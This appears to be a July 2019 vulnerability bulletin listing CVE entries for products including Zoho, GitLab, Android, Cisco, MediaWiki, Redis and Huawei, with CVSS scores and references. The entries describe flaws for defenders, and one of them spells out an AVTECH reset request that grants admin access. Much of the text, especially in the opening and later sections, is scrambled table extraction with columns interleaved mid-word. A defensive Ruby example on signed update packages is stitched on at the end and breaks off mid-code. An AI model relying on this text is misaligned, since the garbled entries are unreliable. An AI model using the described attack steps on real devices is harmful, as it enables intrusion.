Open redirect vulnerability in GROWI v3.4.6 and CVE- earlier allows remote 2019- 2019- weseek -- growi attackersto redirect 5.8 5969 07-05 users to arbitrary web MISC sites and conduct MISC phishing attacks via the process of login.

A cross-site scripting (XSS) vulnerability in CVE- noMenu() and 2019- noSubMenu() in 12930 core/navigation/MENU CONFI 2019- wikindx_project -- wikindx .php in WIKINDX 4.3 RM 07-08 prior to version 5.8.1 CONFI allows remote attackers RM to inject arbitrary web CONFI script or HTML via the RM method parameter. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info

Cross-site scripting vulnerability in Zoho CVE- SalesIQ 1.0.8 and 2019- earlier allows remote 2019- zoho -- salesiq 4.3 5962 attackers to inject 07-05 MISC arbitrary web script or MISC HTML via unspecified vectors.

Cross-site request forgery (CSRF) vulnerability in Zoho CVE- SalesIQ 1.0.8 and 2019- 2019- zoho -- salesiq earlier allows remote 6.8 5963 07-05 attackers to hijack the MISC authentication of MISC administrators via unspecified vectors.

An issue was discovered in Zoho CVE- ManageEngine 2019- zohocorp -- 2019- AssetExplorer. There is 4.3 12595 manageengine_assetexplorer 07-11 XSS via the MISC RCSettings.do MISC rdsName parameter.

An issue was discovered in Zoho ManageEngine CVE- AssetExplorer. There is 2019- zohocorp -- 2019- XSS via 4.3 12596 manageengine_assetexplorer 07-11 SoftwareListView.do MISC with the parameter MISC swType or swComplianceType. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info

An issue was discovered in Zoho CVE- ManageEngine 2019- zohocorp -- AssetExplorer. There is 2019- 4.3 12597 manageengine_assetexplorer XSS via 07-11 MISC ResourcesAttachments. MISC jsp with the parameter pageName.

An issue was discovered in the Purchase component of CVE- Zoho ManageEngine zohocorp -- 2019- ServiceDesk Plus. 2019- manageengine_servicedesk_p 4.3 12539 There is XSS via the 07-11 lus MISC SearchN.do search MISC field, a different vulnerability than CVE-2019-12189.


Low Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
1234n -- minicms | In MiniCMS V1.10, stored XSS was found in mc-admin/page-edit.php (content box), which can be used to get a user's cookie. | 2019-07-05 | 3.5 | CVE-2019-13339 MISC
1234n -- minicms | In MiniCMS V1.10, stored XSS was found in mc-admin/post-edit.php via the content box. An attacker can use it to get a user's cookie. This is different from CVE-2018-10296, CVE-2018-16233, CVE-2018-20520, and CVE-2019-13186. | 2019-07-05 | 3.5 | CVE-2019-13340 MISC
1234n -- minicms | In MiniCMS V1.10, stored XSS was found in mc-admin/conf.php (comment box), which can be used to get a user's cookie. | 2019-07-05 | 3.5 | CVE-2019-13341 MISC
cyberpowersystems -- powerpanel | A stored XSS vulnerability in the Agent/Center component of CyberPower PowerPanel Business Edition 3.4.0 allows a privileged attacker to embed malicious JavaScript in the SNMP trap receivers form. Upon visiting the /agent/action_recipient Event Action/Recipient page, the embedded code will be executed in the browser of the victim. | 2019-07-09 | 3.5 | CVE-2019-13070 MISC MISC
gitlab -- gitlab | GitLab CE/EE, versions 11.3 before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an XSS vulnerability in Markdown fields via unrecognized HTML tags. | 2019-07-10 | 3.5 | CVE-2018-19570 CONFIRM MISC
gitlab -- gitlab | GitLab CE/EE, versions 10.3 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an XSS vulnerability in Markdown fields via Mermaid. | 2019-07-10 | 3.5 | CVE-2018-19573 CONFIRM MISC
gitlab -- gitlab | GitLab CE/EE, versions 7.6 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an XSS vulnerability in the OAuth authorization page. | 2019-07-10 | 3.5 | CVE-2018-19574 MISC MISC
gitlab -- gitlab | GitLab EE version 11.5 is vulnerable to a persistent XSS vulnerability in the Operations page. This is fixed in 11.5.1. | 2019-07-10 | 3.5 | CVE-2018-19579 CONFIRM MISC
google -- android | In HIDL, safe_union, and other C++ structs/unions being sent to application processes, there are uninitialized fields. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9. Android ID: A-131356202 | 2019-07-08 | 2.1 | CVE-2019-2104 CONFIRM
google -- android | In setup wizard there is a bypass of some checks when wifi connection is skipped. This could lead to factory reset protection bypass with no additional privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-122597079. | 2019-07-08 | 2.1 | CVE-2019-2113 CONFIRM
google -- android | In checkQueryPermission of TelephonyProvider.java, there is a possible disclosure of secure data due to a missing permission check. This could lead to local information disclosure about carrier systems with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-124107808. | 2019-07-08 | 2.1 | CVE-2019-2117 CONFIRM
google -- android | In various functions of Parcel.cpp, there are uninitialized or partially initialized stack variables. These could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9. Android ID: A-130161842. | 2019-07-08 | 2.1 | CVE-2019-2118 CONFIRM
google -- android | In multiple functions of key_store_service.cpp, there is a possible Information Disclosure due to improper locking. This could lead to local information disclosure of protected data with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9. Android ID: A-131622568. | 2019-07-08 | 2.1 | CVE-2019-2119 CONFIRM
ibm -- multicloud_manager | IBM Multicloud Manager 3.1.0, 3.1.1, and 3.1.2 ibm-mcm-chart could allow a local attacker with admin privileges to obtain highly sensitive information upon deployment. IBM X-Force ID: 158144. | 2019-07-11 | 2.1 | CVE-2019-4118 CONFIRM XF
libosinfo -- libosinfo | libosinfo 1.5.0 allows local users to discover credentials by listing a process, because credentials are passed to osinfo-install-script via the command line. | 2019-07-05 | 2.1 | CVE-2019-13313 MLIST MISC MISC MISC MISC
nagios -- nagios_xi | Nagios XI before 5.5.4 has XSS in the auto login admin management page. | 2019-07-10 | 3.5 | CVE-2018-17147 BID MISC
redhat -- virt-bootstrap | virt-bootstrap 1.1.0 allows local users to discover a root password by listing a process, because this password may be present in the --root-password option to virt_bootstrap.py. | 2019-07-05 | 2.1 | CVE-2019-13314 MLIST MISC MISC


Severity Not Yet Assigned

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
alarm.com -- adc-v522ir_devices | Alarm.com ADC-V522IR 0100b9 devices have Incorrect Access Control, a different issue than CVE-2018-19588. This occurs because of incorrect protection of VPN certificates (used for initiating a VPN session to the Alarm.com infrastructure) on the local camera device. | 2019-07-11 | not yet calculated | CVE-2019-9657 MISC
alarm.com -- adc-v522ir_devices | Alarm.com ADC-V522IR 0100b9 devices have Incorrect Access Control. | 2019-07-11 | not yet calculated | CVE-2018-19588 MISC
apache -- kafka | In Apache Kafka versions between 0.11.0.0 and 2.1.0, it is possible to manually craft a Produce request which bypasses transaction/idempotent ACL validation. Only authenticated clients with Write permission on the respective topics are able to exploit this vulnerability. Users should upgrade to 2.1.1 or later where this vulnerability has been fixed. | 2019-07-11 | not yet calculated | CVE-2018-17196 MISC
apple -- macos | hide.me before 2.4.4 on macOS suffers from a privilege escalation vulnerability in the connectWithExecutablePath:configFilePath:configFileName method of the me_hide_vpnhelper.Helper class in the me.hide.vpnhelper macOS privilege helper tool. This method takes user-supplied input and can be used to escalate privileges, as well as obtain the ability to run any application on the system in the root context. | 2019-07-08 | not yet calculated | CVE-2019-12174 MISC
arlo -- basestation | Arlo Basestation firmware 1.12.0.1_27940 and prior contain a hardcoded username and password combination that allows root access to the device when an onboard serial interface is connected to. | 2019-07-09 | not yet calculated | CVE-2019-3950 CONFIRM
arlo -- basestation | Arlo Basestation firmware 1.12.0.1_27940 and prior contain a networking misconfiguration that allows access to restricted network interfaces. This could allow an attacker to upload or download arbitrary files and possibly execute malicious code on the device. | 2019-07-09 | not yet calculated | CVE-2019-3949 CONFIRM
avaya -- control_manager | A SQL injection vulnerability in the reporting component of Avaya Control Manager could allow an unauthenticated attacker to execute arbitrary SQL commands and retrieve sensitive data related to other users on the system. Affected versions of Avaya Control Manager include 7.x and 8.0.x versions prior to 8.0.4.0. Unsupported versions not listed here were not evaluated. | 2019-07-11 | not yet calculated | CVE-2019-7003 BID CONFIRM
avtech -- room_alert_3e | On AVTECH Room Alert 3E devices before 2.2.5, an attacker with access to the device's web interface may escalate privileges from an unauthenticated user to administrator by performing a cmd.cgi?action=ResetDefaults&src=RA reset and using the default credentials to get in. | 2019-07-07 | not yet calculated | CVE-2019-13379 MISC MISC
bks -- bks_ebk_ethernet-buskoppler_pro | BKS EBK Ethernet-Buskoppler Pro before 3.01 allows Unrestricted Upload of a File with a Dangerous Type. | 2019-07-05 | not yet calculated | CVE-2019-12971 MISC
blackberry -- qnx_software_development_platform | An information disclosure vulnerability leading to a potential local escalation of privilege in the procfs service (the /proc filesystem) of BlackBerry QNX Software Development Platform version(s) 6.5.0 SP1 and earlier could allow an attacker to potentially gain unauthorized access to a chosen process address space. | 2019-07-12 | not yet calculated | CVE-2019-8998 MISC
broadlearning -- eclass | Any URLs with download_attachment.php under templates or home folders can allow arbitrary files to be downloaded without login in BroadLearning eClass before version ip.2.5.10.2.1. | 2019-07-11 | not yet calculated | CVE-2019-9886 CONFIRM CONFIRM CONFIRM
castle_rock_computing -- snmpc | nodeimp.exe in Castle Rock SNMPc before 9.0.12.1 and 10.x before 10.0.9 has a stack-based buffer overflow via a long variable string in a Map Objects text file. | 2019-07-12 | not yet calculated | CVE-2019-13494 MISC MISC
cisco -- adaptive_security_applicance_software_and_firepower_threat_defense_software | A vulnerability in the cryptographic driver for Cisco Adaptive Security Appliance Software (ASA) and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to reboot unexpectedly. The vulnerability is due to incomplete input validation of a Secure Sockets Layer (SSL) or Transport Layer Security (TLS) ingress packet header. An attacker could exploit this vulnerability by sending a crafted TLS/SSL packet to an interface on the targeted device. An exploit could allow the attacker to cause the device to reload, which will result in a denial of service (DoS) condition. Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode and in single or multiple context mode. This vulnerability can be triggered by IPv4 and IPv6 traffic. A valid SSL or TLS session is required to exploit this vulnerability. | 2019-07-10 | not yet calculated | CVE-2019-1873 BID CISCO
cisco -- advanced_malware_protection_for_endpoints_for_windows | A vulnerability in Cisco Advanced Malware Protection (AMP) for Endpoints for Windows could allow an authenticated, local attacker with administrator privileges to execute arbitrary code. The vulnerability is due to insufficient validation of dynamically loaded modules. An attacker could exploit this vulnerability by placing a file in a specific location in the Windows filesystem. A successful exploit could allow the attacker to execute the code with the privileges of the AMP service. | 2019-07-05 | not yet calculated | CVE-2019-1932 CISCO
cisco -- email_security_appliance | A vulnerability in the attachment scanning of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to bypass configured content filters on the device. The vulnerability is due to improper input validation of the email body. An attacker could exploit this vulnerability by naming a malicious attachment with a specific pattern. A successful exploit could allow the attacker to bypass configured content filters that would normally block the attachment. | 2019-07-05 | not yet calculated | CVE-2019-1921 CISCO
cisco -- email_security_appliance | A vulnerability in the email message scanning of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to bypass configured filters on the device. The vulnerability is due to improper input validation of certain email fields. An attacker could exploit this vulnerability by sending a crafted email message to a recipient protected by the ESA. A successful exploit could allow the attacker to bypass configured message filters and inject arbitrary scripting code inside the email body. The malicious code is not executed by default unless the recipient's email client is configured to execute scripts contained in emails. | 2019-07-05 | not yet calculated | CVE-2019-1933 CISCO
cisco -- enterprise_nfv_infrastructure_software | A vulnerability in Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker with administrator privileges to overwrite or read arbitrary files on the underlying operating system (OS) of an affected device. The vulnerability is due to improper input validation in NFVIS filesystem commands. An attacker could exploit this vulnerability by using crafted variables during the execution of an affected command. A successful exploit could allow the attacker to overwrite or read arbitrary files on the underlying OS. | 2019-07-05 | not yet calculated | CVE-2019-1894 CISCO
cisco -- enterprise_nfv_infrastructure_software | A vulnerability in Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system (OS) of an affected device as root. The vulnerability is due to insufficient input validation of a configuration file that is accessible to a local shell user. An attacker could exploit this vulnerability by including malicious input during the execution of this file. A successful exploit could allow the attacker to execute arbitrary commands on the underlying OS as root. | 2019-07-05 | not yet calculated | CVE-2019-1893 CISCO
cisco -- firepower_management_center | Multiple vulnerabilities in the RSS dashboard in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface of the affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. | 2019-07-05 | not yet calculated | CVE-2019-1931 CISCO
cisco -- firepower_management_center | Multiple vulnerabilities in the RSS dashboard in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface of the affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. | 2019-07-05 | not yet calculated | CVE-2019-1930 CISCO
cisco -- ios_xr_software | A vulnerability in the implementation of Border Gateway Protocol (BGP) functionality in Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected system. The vulnerability is due to incorrect processing of certain BGP update messages. An attacker could exploit this vulnerability by sending BGP update messages that include a specific set of attributes to be processed by an affected system. A successful exploit could allow the attacker to cause the BGP process to restart unexpectedly, resulting in a DoS condition. The Cisco implementation of BGP accepts incoming BGP traffic from explicitly defined peers only. To exploit this vulnerability, the malicious BGP update message would need to come from a configured, valid BGP peer or would need to be injected by the attacker into the victim's BGP network on an existing, valid TCP connection to a BGP peer. | 2019-07-05 | not yet calculated | CVE-2019-1909 CISCO
cisco -- ip_phone_7800_series_and_8800_series | A vulnerability in Cisco SIP IP Phone Software for Cisco IP Phone 7800 Series and 8800 Series could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected phone. The vulnerability is due to insufficient validation of input Session Initiation Protocol (SIP) packets. An attacker could exploit this vulnerability by altering the SIP replies that are sent to the affected phone during the registration process. A successful exploit could allow the attacker to cause the phone to reboot and not complete the registration process. | 2019-07-05 | not yet calculated | CVE-2019-1922 CISCO
cisco -- small_business_200_and_300_and_500_series_managed_switches | A vulnerability in the Secure Sockets Layer (SSL) input packet processor of Cisco Small Business 200, 300, and 500 Series Managed Switches could allow an unauthenticated, remote attacker to cause a memory corruption on an affected device. The vulnerability is due to improper validation of HTTPS packets. An attacker could exploit this vulnerability by sending a malformed HTTPS packet to the management web interface of the affected device. A successful exploit could allow the attacker to cause an unexpected reload of the device, resulting in a denial of service (DoS) condition. | 2019-07-05 | not yet calculated | CVE-2019-1892 CISCO
cisco -- small_business_200_and_300_and_500_series_managed_switches | A vulnerability in the web interface of Cisco Small Business 200, 300, and 500 Series Managed Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper validation of requests sent to the web interface. An attacker could exploit this vulnerability by sending a malicious request to the web interface of an affected device. A successful exploit could allow the attacker to cause an unexpected reload of the device, resulting in a DoS condition. | 2019-07-05 | not yet calculated | CVE-2019-1891 CISCO
cisco -- unified_communications_domain_manager | A vulnerability in the CLI of Cisco Unified Communications Domain Manager (Cisco Unified CDM) Software could allow an authenticated, local attacker to escape the restricted shell. The vulnerability is due to insufficient input validation of shell commands. An attacker could exploit this vulnerability by executing crafted commands in the shell. A successful exploit could allow the attacker to escape the restricted shell and access commands in the context of the restricted shell user, which does not have root privileges. | 2019-07-05 | not yet calculated | CVE-2019-1911 CISCO
citrix -- xenserver | The Windows Guest Tools in Citrix XenServer 6.2 SP1 and earlier allows remote attackers to cause a denial of service (guest OS crash) via a crafted Ethernet frame. | 2019-07-11 | not yet calculated | CVE-2014-3798 SECUNIA CONFIRM BID SECTRACK
cloud_foundry -- uaa | Cloud Foundry UAA versions prior to 73.3.0 contain endpoints with improper escaping. An authenticated malicious user with basic read privileges for one identity zone can extend those reading privileges to all other identity zones and obtain private information on users, clients, and groups in all other identity zones. | 2019-07-11 | not yet calculated | CVE-2019-11268 CONFIRM
cloudera -- cloudera_manager | Cloudera Manager through 5.15 has Incorrect Access Control. | 2019-07-11 | not yet calculated | CVE-2018-11744 CONFIRM MISC
cohesity -- dataplatform | A man-in-the-middle vulnerability related to vCenter access was found in Cohesity DataPlatform version 5.x and 6.x prior to 6.1.1c. Cohesity clusters did not verify TLS certificates presented by vCenter. This vulnerability could expose Cohesity user credentials configured to access vCenter. | 2019-07-12 | not yet calculated | CVE-2019-11242 CONFIRM
container_build_system -- osbs-client | A flaw was found in the yaml.load() function in the osbs-client versions since 0.46 before 0.56.1. Insecure use of the yaml.load() function allowed the user to load any suspicious object for code execution via the parsing of malicious YAML files. | 2019-07-11 | not yet calculated | CVE-2019-10135 CONFIRM CONFIRM
cyberpower -- powerpanel_business | CSRF in the Agent/Center component of CyberPower PowerPanel Business Edition 3.4.0 allows an attacker to submit POST requests to any forms in the web application. This can be exploited by tricking an authenticated user into visiting an attacker controlled web page. | 2019-07-10 | not yet calculated | CVE-2019-13071 MISC FULLDISC
damicms -- damicms | An arbitrary file read vulnerability in DamiCMS v6.0.0 allows remote authenticated administrators to read any files in the server via a crafted /admin.php?s=Tpl/Add/id/ URI. | 2019-07-10 | not yet calculated | CVE-2018-14831 MISC
ddrt -- dashcom_live | Lack of authentication in file-viewing components in DDRT Dashcom Live 2019-05-09 allows anyone to remotely access all claim details by visiting easily guessable dashboard/uploads/claim_files/claim_id_ URLs. | 2019-07-09 | not yet calculated | CVE-2019-11020 MISC MISC
ddrt -- dashcom_live | Lack of authentication in case-exporting components in DDRT Dashcom Live through 2019-05-08 allows anyone to remotely access all claim details by visiting easily guessable exportpdf/all_claim_detail.php?claim_id= URLs. | 2019-07-09 | not yet calculated | CVE-2019-11019 MISC MISC
debian -- mediawiki | An Incorrect Access Control vulnerability was found in Wikimedia MediaWiki 1.18.0 through 1.32.1. It is possible to bypass the limits on IP range blocks ($wgBlockCIDRLimit) by using the API. Fixed in 1.32.2, 1.31.2, 1.30.2 and 1.27.6. | 2019-07-10 | not yet calculated | CVE-2019-12472 CONFIRM MISC
debian -- mediawiki | An Incorrect Access Control vulnerability was found in Wikimedia MediaWiki 1.27.0 through 1.32.1. Directly POSTing to Special:ChangeEmail would allow for bypassing re-authentication, allowing for potential account takeover. | 2019-07-10 | not yet calculated | CVE-2019-12468 MISC CONFIRM MISC BUGTRAQ DEBIAN
debian -- mediawiki | MediaWiki through 1.32.1 has Incorrect Access Control (issue 1 of 3). A spammer can use Special:ChangeEmail to send out spam with no rate limiting or ability to block them. Fixed in 1.32.2, 1.31.2, 1.30.2 and 1.27.6. | 2019-07-10 | not yet calculated | CVE-2019-12467 CONFIRM MISC BUGTRAQ DEBIAN
debian -- mediawiki | Wikimedia MediaWiki 1.30.0 through 1.32.1 has XSS. Loading user JavaScript from a non-existent account allows anyone to create the account, and perform XSS on users loading that script. Fixed in 1.32.2, 1.31.2, 1.30.2 and 1.27.6. | 2019-07-10 | not yet calculated | CVE-2019-12471 CONFIRM MISC BUGTRAQ DEBIAN
debian -- mediawiki | Wikimedia MediaWiki 1.27.0 through 1.32.1 might allow DoS. Passing invalid titles to the API could cause a DoS by querying the entire watchlist table. Fixed in 1.32.2, 1.31.2, 1.30.2 and 1.27.6. | 2019-07-10 | not yet calculated | CVE-2019-12473 CONFIRM MISC BUGTRAQ DEBIAN
debian -- mediawiki | Wikimedia MediaWiki through 1.32.1 has Incorrect Access Control. Suppressed log in RevisionDelete page is exposed. Fixed in 1.32.2, 1.31.2, 1.30.2 and 1.27.6. | 2019-07-10 | not yet calculated | CVE-2019-12470 CONFIRM MISC BUGTRAQ DEBIAN
debian -- mediawiki | MediaWiki through 1.32.1 has Incorrect Access Control. Suppressed username or log in Special:EditTags are exposed. Fixed in 1.32.2, 1.31.2, 1.30.2 and 1.27.6. | 2019-07-10 | not yet calculated | CVE-2019-12469 CONFIRM MISC BUGTRAQ DEBIAN
debian -- redis | A stack-buffer overflow vulnerability was found in the Redis hyperloglog data structure versions 3.x before 3.2.13, 4.x before 4.0.14 and 5.x before 5.0.4. By corrupting a hyperloglog using the SETRANGE command, an attacker could cause Redis to perform controlled increments of up to 12 bytes past the end of a stack-allocated buffer. | 2019-07-11 | not yet calculated | CVE-2019-10193 CONFIRM MISC MISC MISC BUGTRAQ DEBIAN
debian -- redis | A heap-buffer overflow vulnerability was found in the Redis hyperloglog data structure versions 3.x before 3.2.13, 4.x before 4.0.14 and 5.x before 5.0.4. By carefully corrupting a hyperloglog using the SETRANGE command, an attacker could trick Redis interpretation of dense HLL encoding to write up to 3 bytes beyond the end of a heap-allocated buffer. | 2019-07-11 | not yet calculated | CVE-2019-10192 CONFIRM MISC MISC MISC BUGTRAQ DEBIAN
digium -- asterisk | Buffer overflow in res_pjsip_messaging in Digium Asterisk versions 13.21-cert3, 13.27.0, 15.7.2, 16.4.0 and earlier allows remote authenticated users to crash Asterisk by sending a specially crafted SIP MESSAGE message. | 2019-07-12 | not yet calculated | CVE-2019-12827 CONFIRM CONFIRM
digium -- asterisk | An issue was discovered in Asterisk Open Source through 13.27.0, 14.x and 15.x through 15.7.2, and 16.x through 16.4.0, and Certified Asterisk through 13.21-cert3. A pointer dereference in chan_sip while handling SDP negotiation allows an attacker to crash Asterisk when handling an SDP answer to an outgoing T.38 re-invite. To exploit this vulnerability an attacker must cause the chan_sip module to send a T.38 re-invite request to them. Upon receipt, the attacker must send an SDP answer containing both a T.38 UDPTL stream and another media stream containing only a codec (which is not permitted according to the chan_sip configuration). | 2019-07-12 | not yet calculated | CVE-2019-13161 CONFIRM CONFIRM
e107 -- e107 | In e107 v2.1.7, output without filtering results in XSS. | 2019-07-10 | not yet calculated | CVE-2018-11734 MISC
eq-3 -- homematic_ccu2_devices | eQ-3 HomeMatic CCU2 devices before 2.41.9 and CCU3 devices before 3.43.16 have buffer overflows in the ReGa ise GmbH HTTP-Server 2.0 component, aka HMCCU-179. This may lead to remote code execution. | 2019-07-10 | not yet calculated | CVE-2019-10122 MISC MISC
eq-3 -- homematic_ccu2_devices | eQ-3 HomeMatic CCU2 devices before 2.41.8 and CCU3 devices before 3.43.16 use session IDs for authentication but lack authorization checks. An attacker can obtain a session ID via an invalid login attempt to the RemoteApi account, aka HMCCU-154. This leads to automatic login as admin. | 2019-07-10 | not yet calculated | CVE-2019-10119 MISC MISC
eq-3 -- homematic_ccu2_devices | On eQ-3 HomeMatic CCU2 devices before 2.41.8 and CCU3 devices before 3.43.16, automatic login configuration (aka setAutoLogin) can be achieved by continuing to use a | 2019-07-10 | not yet calculated | CVE-2019-10120 MISC

session ID after a logout, aka C HMCCU-154. MIS C

CV eQ-3 HomeMatic CCU2 devices E- before 2.41.8 and CCU3 devices 201 before 3.43.15 use session IDs not 9- for authentication but lack 201 yet 101 eq-3 -- authorization checks. An 9- cal 21 homematic_ccu2_devices attacker can obtain a session ID 07- cul MIS via the user authentication 10 ate C dialogue, aka HMCCU-153. d MIS This leads to automatic login as C admin. MIS C

CV E- 201 8- An issue was discovered in 113 FasterXML jackson-databind not 07 2.0.0 through 2.9.5. Use of 201 yet CO fasterxml -- jackson- Jackson default typing along 9- cal NFI databind with a gadget class from iBatis 07- cul RM allows exfiltration of content. 09 ate MIS Fixed in 2.7.9.4, 2.8.11.2, and d C 2.9.6. MIS C MIS C field_test_gem_for_ruby_on The field_test gem 0.3.0 for 201 not CV _rails -- Ruby has unvalidated input. A 9- yet E- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info field_test_gem_for_ruby_on method call that is expected to 07- cal 201 _rails return a value from a certain set 09 cul 9- of inputs can be made to return ate 131 any input, which can be d 46 dangerous depending on how BID applications use it. If an MIS application treats arbitrary C variants as trusted, this can lead MIS to a variety of potential C vulnerabilities like SQL injection or cross-site scripting (XSS).

FlightPath 4.x and 5.0-x allows CV directory traversal and Local E- not File Inclusion through the 201 201 yet form_include parameter in an 9- 9- cal flightpath -- flightpath index.php?q=system-handle- 133 07- cul form-submit POST request 96 10 ate because of an include_once in CO d system_handle_form_submit in NFI modules/system/system.module. RM

In GE Aestiva and Aespire CV versions 7100 and 7900, a E- vulnerability exists where serial not 201 devices are connected via an 201 yet 9- ge_healthcare -- added unsecured terminal server 9- cal 109 aestiva_and_aespire to a TCP/IP network 07- cul 66 configuration, which could 10 ate BID allow an attacker to remotely d MIS modify device configuration and C silence alarms. Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info

GLPI GLPI Product 9.3.1 is affected by: Frame and Form tags Injection allowing admins to phish users by putting code in CV reminder description. The E- impact is: Admins can phish any 201 user or group of users for not 9- credentials / credit cards. The 201 yet 101 component is: Tools > 9- cal glpi_project -- glpi 031 Reminder > Description .. Set 07- cul 0 the description to any 12 ate MIS iframe/form tags and apply. The d C attack vector is: The attacker MIS puts a login form, the user fills it C and clicks on submit .. the request is sent to the attacker domain saving the data. The fixed version is: 9.4.1.

CV E- 201 9- An issue was discovered in 132 GLPI before 9.4.1. After a not 40 successful password reset by a 201 yet MIS user, it is possible to change that 9- cal C glpi_project -- glpi user's password again during the 07- cul MIS next 24 hours without any 10 ate C information except the d MIS associated email address. C MIS C MIS C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info

HPE has identified a vulnerability in HPE 3PAR Service Processor (SP) version CV 4.1 through 4.4. HPE 3PAR E- not Service Processor (SP) version 201 201 yet 4.1 through 4.4 has a remote 9- hewlett_packard_enterprise 9- cal information disclosure 119 -- 3par_service_processor 07- cul vulnerability which can allow 91 09 ate for the disruption of the CO d confidentiality, integrity and NFI availability of the Service RM Processor and any managed 3PAR arrays.

There is a Factory Reset Protection (FRP) bypass vulnerability on several smartphones. The system does not sufficiently verify the permission, an attacker could do CV a certain operation on certain E- step of setup wizard. Successful not 201 exploit could allow the attacker 201 yet huawei -- 9- bypass the FRP protection. 9- cal mate_20_and_mate_20_X_h 522 Affected products: Mate 20 X, 07- cul onor_magic_2 0 versions earlier than Ever- 10 ate CO AL00B d NFI 9.0.0.200(C00E200R2P1); Mate RM 20, versions earlier than Hima- AL00B/Hima-TL00B 9.0.0.200(C00E200R2P1); Honor Magic 2, versions earlier than Tony-AL00B/Tony-TL00B 9.0.0.182(C00E180R2P2). Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info

There is a path traversal vulnerability on Huawei Share. The software does not properly validate the path, an attacker could crafted a file path when CV transporting file through Huawei E- not Share, successful exploit could 201 201 yet allow the attacker to transport a 9- 9- cal huawei -- mate_20_x file to arbitrary path on the 522 07- cul phone. Affected products: Mate 1 10 ate 20 X versions earlier than Ever- CO d L29B NFI 9.1.0.300(C432E3R1P12), RM versions earlier than Ever-L29B 9.1.0.300(C636E3R2P1), and versions earlier than Ever-L29B 9.1.0.300(C185E3R3P1).

In Hunesion i-oneNet version 3.0.7 ~ 3.0.53 and 4.0.4 ~ CV 4.0.16, the specific upload web E- not module doesn't verify the file 201 201 yet extension and type, and an 9- 9- cal hunesion -- i-onenet attacker can upload a webshell. 128 07- cul After the webshell upload, an 03 10 ate attacker can use the webshell to CO d perform remote code exection NFI such as running a system RM command.

not CV In Hunesion i-oneNet version 201 yet E- 3.0.7 ~ 3.0.53 and 4.0.4 ~ 9- cal 201 hunesion -- i-onenet 4.0.16, due to the lack of update 07- cul 9- file integrity checking in the 10 ate 128 upgrade process, an attacker can d 04 Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info

craft malicious file and use it as CO an update. NFI RM
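The two Hunesion entries above describe an upgrade path that installs whatever file it is handed. The Ruby example below is added here to show the check that was missing; it is not Hunesion's code and nothing about the real i-oneNet update format is known from this bulletin. It signs a package with a vendor key and makes the client refuse any package whose detached signature does not verify under a pinned public key. The key pair, package bytes and the `apply_update` helper are constructed for the example. It also shows why a digest shipped next to the package is not an integrity check on its own.

```ruby
require "openssl"

# Constructed for this example: the vendor's signing key. In a real product the
# private half stays on the vendor's build system; only the public key ships
# inside the client that performs upgrades.
VENDOR_PRIVATE_KEY = OpenSSL::PKey::RSA.new(2048)
VENDOR_PUBLIC_KEY  = OpenSSL::PKey::RSA.new(VENDOR_PRIVATE_KEY.public_key.to_pem)

# Vendor side: detached RSA signature over SHA-256 of the whole package.
def sign_package(private_key, package_bytes)
  private_key.sign(OpenSSL::Digest.new("SHA256"), package_bytes)
end

# Client side: true only if the signature verifies under the pinned key.
# A malformed signature raises in some OpenSSL builds; treat that as invalid.
def signature_valid?(public_key, package_bytes, signature)
  public_key.verify(OpenSSL::Digest.new("SHA256"), signature, package_bytes)
rescue OpenSSL::PKey::PKeyError
  false
end

# Not an integrity check: a digest shipped next to the package is recomputed
# by whoever replaces the package, so it only detects accidental corruption.
def checksum_only_valid?(package_bytes, shipped_sha256_hex)
  OpenSSL::Digest::SHA256.hexdigest(package_bytes) == shipped_sha256_hex
end

# Upgrade entry point: refuse to unpack anything that does not verify.
# Returns :applied or :rejected; the install step itself is out of scope here.
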